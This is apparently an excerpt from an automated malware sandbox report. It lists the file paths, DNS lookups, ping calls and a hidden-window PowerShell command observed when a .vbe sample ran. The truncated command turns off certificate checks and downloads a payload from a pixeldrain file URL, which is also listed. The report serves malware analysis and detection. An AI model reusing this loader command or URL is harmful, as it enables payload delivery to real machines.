Technical information
- https://pixeldrain.com/api/file/2qddqqyq
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK pi###drain.com
- '<SYSTEM32>\ping.exe' pixeldrain.com' (with a hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $taMkTPGUqPuO='<PATH_SAMPLE>.vbe';[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$QNqRirBloyC=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/2Q...' (with a hidden window)
- '<SYSTEM32>\ping.exe' pixeldrain.com